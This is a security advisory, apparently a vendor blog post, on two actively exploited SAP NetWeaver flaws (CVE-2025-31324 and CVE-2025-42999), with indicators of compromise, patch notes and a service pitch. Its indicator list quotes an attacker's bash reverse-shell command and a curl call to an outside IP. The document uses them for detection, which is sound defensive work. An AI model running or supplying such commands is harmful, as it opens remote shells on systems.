SAP NetWeaver Zero-Day: CVE-2025-31324 + 42999 Exploited

May 15, 2025

🚨 SAP NetWeaver Zero-Day Vulnerabilities: Active Exploitation and Indicators of Compromise

SAP has disclosed two critical zero-day vulnerabilities in its NetWeaver platform: CVE-2025-31324 and CVE-2025-42999. These vulnerabilities are under active exploitation, with attackers deploying web shells and establishing persistent access to enterprise systems.

🔍 CVE-2025-31324 – Unauthenticated File Upload

This vulnerability in the MetadataUploaderServlet of SAP NetWeaver Visual Composer allows unauthenticated attackers to upload arbitrary files, such as JSP web shells, leading to remote code execution. Exploitation has been observed since March 2025, with attackers deploying web shells like cache.jsp, helper.jsp, and randomly named files (e.g., cglswdjp.jsp).

🛡️ CVE-2025-42999 – Insecure Deserialization

This vulnerability allows privileged users to exploit insecure deserialization in the Visual Composer component, potentially leading to remote code execution. While exploitation requires specific user roles, it has been observed in conjunction with CVE-2025-31324 to maintain persistent access.

🎯 Indicators of Compromise (IOCs)

File Artifacts:

  • Presence of unauthorized .jsp, .java, or .class files in directories such as:
    • /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root
    • /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work
    • /usr/sap/<SID>/<InstanceID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/work/sync

Network Indicators:

  • Outbound connections to IP addresses such as 43.247.135[.]53 over TCP port 10443.
  • DNS beaconing to domains like *.oastify.com.

Command Execution:

  • Use of reverse shell commands, e.g.:
    • /bin/bash -i >& /dev/tcp/43.247.135[.]53/10443 0>&1
    • curl http://43.247.135[.]53:10443

🛠️ Recommended Actions

  1. Immediate Patching: Apply SAP Security Notes #3594142 and #3604119 to address CVE-2025-31324 and CVE-2025-42999, respectively.
  2. System Audit: Scan for unauthorized files in the specified directories and monitor for unusual network activity.
  3. Access Controls: Restrict external access to SAP NetWeaver systems and enforce multi-factor authentication for administrative interfaces.
  4. Monitoring: Implement continuous monitoring to detect and respond to potential threats promptly.

🛡️ Enhance Your Security Posture

Given the critical nature of these vulnerabilities, it’s imperative to ensure your systems are protected. Our Patch Management Services can help you stay ahead of such threats by ensuring timely updates and continuous monitoring. Please reach out if you would like to inquire about our patch management or proactive threat hunting capabilities to identify malicious activity, such as this SAP NetWeaver Zero-Day Vulnerability exploitation.